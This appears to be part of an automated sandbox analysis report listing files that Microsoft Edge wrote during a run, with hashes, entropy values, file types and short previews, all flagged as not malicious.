                                                                                                                                                                                                                                                MD5:89BB391DBE4147929DFDA3A1803248FA
                                                                                                                                                                                                                                                SHA1:8FF000F8BAAA422CE34E9DA15BFD3C309F5F058A
                                                                                                                                                                                                                                                SHA-256:1722881C50AD11EA23254CA5663D2E089CE605017E82F81908F4F07DDB4F1342
                                                                                                                                                                                                                                                SHA-512:FF938B7B416301F9631EC1C8994FBAA5E34427EA425F998EC6361DEE8E66808A4A79747A9AEF23E2B6012CB3F1DE8535E0976DBBE349E6EE2A01FD10C5D0E395
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SNSS.......`.:"...........`.:"......"`.:"...........`.:".......`.:".......a.:".......a.:"....!..a.:"...............................`.:"a.:"1..,...a.:"$...8c8f4e83_e882_4d8b_a34f_6f86abb2a21d...`.:".......a.:"....C.........`.:"...`.:".......................`.:"....................5..0...`.:"&...{4B3AC14B-43E5-4896-86E8-9E7D502CE1B5}.....`.:".......`.:"..........................a.:"...........a.:"........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........r.`e)...r.`e).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):358
                                                                                                                                                                                                                                                Entropy (8bit):5.183387651069395
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/KAOq2PcNwi23oH+Tcwt7Uh2ghZIFUt8O/HSrZmw+O/HShkwOcNwi23oH+Tcwts:7/KAOvLZYebIhHh2FUt8O/HG/+O/H65h
                                                                                                                                                                                                                                                MD5:AAB0FE40A2B97AFAB6F070476872B194
                                                                                                                                                                                                                                                SHA1:94C745C62327F96D9A86A7037EF0A30343F85BA3
                                                                                                                                                                                                                                                SHA-256:C91F689D24D888C733ABE81EC6C76DAF450C2571F8A437CD6367015A1DC0BBC7
                                                                                                                                                                                                                                                SHA-512:15805C3A20CAC7132C3BBF6EA3944FD2B891B714F61BE654D6EDAF1DD5FF9296BC78091799CD28CAD5037AF0939F6669A6E1BA2BFC8BDDE5AB8461A92C8D3A5B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.766 1804 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/16-11:07:26.785 1804 Recovering log #3.2024/12/16-11:07:26.785 1804 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):358
                                                                                                                                                                                                                                                Entropy (8bit):5.183387651069395
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/KAOq2PcNwi23oH+Tcwt7Uh2ghZIFUt8O/HSrZmw+O/HShkwOcNwi23oH+Tcwts:7/KAOvLZYebIhHh2FUt8O/HG/+O/H65h
                                                                                                                                                                                                                                                MD5:AAB0FE40A2B97AFAB6F070476872B194
                                                                                                                                                                                                                                                SHA1:94C745C62327F96D9A86A7037EF0A30343F85BA3
                                                                                                                                                                                                                                                SHA-256:C91F689D24D888C733ABE81EC6C76DAF450C2571F8A437CD6367015A1DC0BBC7
                                                                                                                                                                                                                                                SHA-512:15805C3A20CAC7132C3BBF6EA3944FD2B891B714F61BE654D6EDAF1DD5FF9296BC78091799CD28CAD5037AF0939F6669A6E1BA2BFC8BDDE5AB8461A92C8D3A5B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.766 1804 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/16-11:07:26.785 1804 Recovering log #3.2024/12/16-11:07:26.785 1804 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                Entropy (8bit):0.0018090556708630736
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zEZlXollt:/M/xT02zh1
                                                                                                                                                                                                                                                MD5:C45E5E6750C4307FD4054EFEC17F4983
                                                                                                                                                                                                                                                SHA1:C2F42E415C03F9BA579BE171F699823F40730C47
                                                                                                                                                                                                                                                SHA-256:FCB7F96C2FABF7A5E52B06B6A4D2D1744E7B7B4A855979EE1B7916FF028C9CA9
                                                                                                                                                                                                                                                SHA-512:460FDA09B3328B0E64DE9303980943B743C88634D99F61EB2F158F6EC6C17D71849AA284673272B0C22804859BC88748B928F24D8F909CB399F8B9427EB06CBD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                Entropy (8bit):5.265746393846853
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/DOyvLZYebvqBQFUt8O/EZ/+O/TR54ZYebvqBvJ:7/DOYlYebvZg8O/EN/TDoYebvk
                                                                                                                                                                                                                                                MD5:BFF7FA958EFE638022D7134D6EA3C100
                                                                                                                                                                                                                                                SHA1:1ED8B247B16E5B5DC99DFBD4CDDF997FA6520752
                                                                                                                                                                                                                                                SHA-256:E26118E633357FF440FE376C10F495C82C96FFBF9D9D4C0981CF330B72333FE2
                                                                                                                                                                                                                                                SHA-512:2DEF59E637A687DD142B597358D1422EF82BEE199F515E71287830525C960E98EF25A6400DD4F3C83152616DC4C618581618A175744DE9A36074411B62EDE92B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.560 1534 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/16-11:07:27.566 1534 Recovering log #3.2024/12/16-11:07:27.585 1534 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                Entropy (8bit):5.265746393846853
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/DOyvLZYebvqBQFUt8O/EZ/+O/TR54ZYebvqBvJ:7/DOYlYebvZg8O/EN/TDoYebvk
                                                                                                                                                                                                                                                MD5:BFF7FA958EFE638022D7134D6EA3C100
                                                                                                                                                                                                                                                SHA1:1ED8B247B16E5B5DC99DFBD4CDDF997FA6520752
                                                                                                                                                                                                                                                SHA-256:E26118E633357FF440FE376C10F495C82C96FFBF9D9D4C0981CF330B72333FE2
                                                                                                                                                                                                                                                SHA-512:2DEF59E637A687DD142B597358D1422EF82BEE199F515E71287830525C960E98EF25A6400DD4F3C83152616DC4C618581618A175744DE9A36074411B62EDE92B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:27.560 1534 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/16-11:07:27.566 1534 Recovering log #3.2024/12/16-11:07:27.585 1534 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2
                                                                                                                                                                                                                                                Entropy (8bit):1.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:H:H
                                                                                                                                                                                                                                                MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[]
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):111
                                                                                                                                                                                                                                                Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):80
                                                                                                                                                                                                                                                Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):428
                                                                                                                                                                                                                                                Entropy (8bit):5.234548376955389
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:7/k5N+vLZYebvqBZFUt8O/kHZ/+O/kBV54ZYebvqBaJ:7/JlYebvyg8O/qN/YoYebvL
                                                                                                                                                                                                                                                MD5:1556A3FF2A03F609296C3FF031BB8A47
                                                                                                                                                                                                                                                SHA1:9F66D455F03751109FEF35FEE1089673F52A60EC
                                                                                                                                                                                                                                                SHA-256:A2D14CC4A862495C816EA0A4EAF596B906E85F787EDC6C79AA8A58EC8FE28980
                                                                                                                                                                                                                                                SHA-512:58177C59CDBCFB6CE88C45BA7AE4D1D94860912A82D5A71D02EC0FC24E9D8B47F2C0BF568CC74EA394480869E5A1F5B7CF44BA53A1B81BB1BA3C4F0DEF88323A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:45.370 1b0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/16-11:07:45.372 1b0c Recovering log #3.2024/12/16-11:07:45.376 1b0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):334
                                                                                                                                                                                                                                                Entropy (8bit):5.217873365854551
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/dIOq2PcNwi23oH+TcwtpIFUt8O/rvZZmw+O/rvzkwOcNwi23oH+Tcwta/WLJ:7/HvLZYebmFUt8O/rh/+O/r754ZYebaQ
                                                                                                                                                                                                                                                MD5:D7B9A4D2A07C6DEF3617A9B9A98F213F
                                                                                                                                                                                                                                                SHA1:C663E76286CBB65BD7FA6F141B972A7A814AE2DD
                                                                                                                                                                                                                                                SHA-256:D20851092D794C2EEB4FB4EFEEA5FA10E4967AE831200D69A4232C2F8A4C2FA5
                                                                                                                                                                                                                                                SHA-512:782309F34D2CB6DC49280068E00FB5167D3624AA847AFD39BDC376AB407DD31E4A9632E1FC6C8A9ECC62AC42F28A84E180C5738A389623DFEFE34853307D3BF0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.729 15e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/16-11:07:26.755 15e0 Recovering log #3.2024/12/16-11:07:26.755 15e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                Entropy (8bit):1.265218452828871
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMCSAELyKOMq+8HKkjucswRv8p3nVumH:K0q+n0JC9ELyKOMq+8HKkjuczRv89D
                                                                                                                                                                                                                                                MD5:7C249851A2911B3A022EAC881865A7B5
                                                                                                                                                                                                                                                SHA1:CAF47563F78974C64F0F7265F3647C199B1AD8A5
                                                                                                                                                                                                                                                SHA-256:77B59D9F995AC8D2674E3CF9799A069AB6DBFEA8AD431D06CF1820946F0C767D
                                                                                                                                                                                                                                                SHA-512:DD78A3338802BEB75F4AABC0F216612E03E69C29C0FB1A7E69AF1C7ACBB7DA50E81BFDF4B3A5967D5A7536BFC95665CEDB633ECF2E2E3BB27CBE9BBDDD2FCFDB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                Entropy (8bit):0.46689783847520633
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBJ8h:v7doKsKuKZKlZNmu46yjxKh
                                                                                                                                                                                                                                                MD5:77936444174CCB2BFE0208862CC0C4F4
                                                                                                                                                                                                                                                SHA1:B878E0DED42E1EBF23AA14F674289F823AD3F178
                                                                                                                                                                                                                                                SHA-256:225D9618889093F2E4E0748F0934808E0B1FDE4CCE484B7F6C3036ECE394E9E4
                                                                                                                                                                                                                                                SHA-512:3F7029E71EE97540661311214C4A72EA6E87F1A28B10BF2F9CE95492A7236582C95EC15EF5E7D9F2DA3C30F3341E4C2113294905D39A31A8908848EC70F76F72
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11755
                                                                                                                                                                                                                                                Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                                                                                                MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                                                                                                SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                                                                                                SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                                                                                                SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9682
                                                                                                                                                                                                                                                Entropy (8bit):5.108504244397563
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:stdkdpbsH7RyaNP9k7Se8VpbV+Fa2QAwT+PHYJ:stdQbsHltJjbGLQxr
                                                                                                                                                                                                                                                MD5:FE7B66572E64EEF775CAC92773270830
                                                                                                                                                                                                                                                SHA1:3608D9E229490604B724DA267A3AC4E70906ACA5
                                                                                                                                                                                                                                                SHA-256:473DED48B8E775A0A4757361B6A4DC2C3D962AC9540140D050A18733080B1458
                                                                                                                                                                                                                                                SHA-512:2BEB82B93A0DDAC97C76D3FA045DEEA148D17F6EEEBD02E819865BA523745926D273B0E17EA8D5DE4A3CFDE6BF27398208C527C1FB8DD2E7E86ECD328AD1D416
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378838847322929","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                Encrypted:false
